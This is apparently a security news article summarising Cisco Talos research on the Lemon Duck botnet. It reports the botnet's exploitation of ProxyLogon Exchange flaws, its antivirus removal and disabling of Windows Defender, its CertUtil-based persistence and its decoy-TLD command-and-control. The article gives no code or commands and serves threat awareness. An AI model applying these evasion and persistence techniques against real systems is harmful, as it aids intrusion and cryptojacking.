Researchers have reported that the Lemon Duck hacking group started targeting Microsoft Exchange Server vulnerabilities known as ProxyLogon and using decoy top-level domains.
ProxyLogon vulnerabilities have been used in attacks on thousands of organizations and various hacker groups are still trying to exploit them.
Researchers from Cisco Talos have described how Lemon Duck’s operators are incorporating new tools to “maximize the effectiveness of their campaigns” by targeting the ProxyLogon vulnerabilities. Telemetry data for Lemon Duck domains indicates that its operators’ activity spiked in April.
“New TTPs consistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software vulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific interest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet,” researchers note.
For the initial stage of attacks, Lemon Duck operators scan, detect, and exploit servers using automated tools. They try then to deliver such payloads as Cobalt Strike DNS beacons and web shells. They ultimately install cryptocurrency mining software and some additional malware.
The malware’s PowerShell scripts will try to remove antivirus products, including those by ESET and Kaspersky, and kill any competing cryptocurrency miners. They will also attempt to stop services like Windows Update and Windows Defender so that they do not hamper the infection process.
“The use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments,” the researchers say.
To maintain persistence, Lemon Duck’s operators schedule tasks and will download two new PowerShell scripts by abusing the CertUtil command-line program.
To obfuscate their command-and-control (C2) center infrastructure, Lemon Duck hackers have also created decoy top-level domains (TLDs) for China, Japan, and South Korea.
“Considering these ccTLDs are most commonly used for websites in their respective countries and languages, it is also interesting that they were used, rather than more generic and globally used TLDs such as “.com” or “.net,” Cisco Talos notes. “This may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments.”
Researchers have observed similarities between the Lemon Duck botnet and Beapy/Pcastle cryptocurrency malware.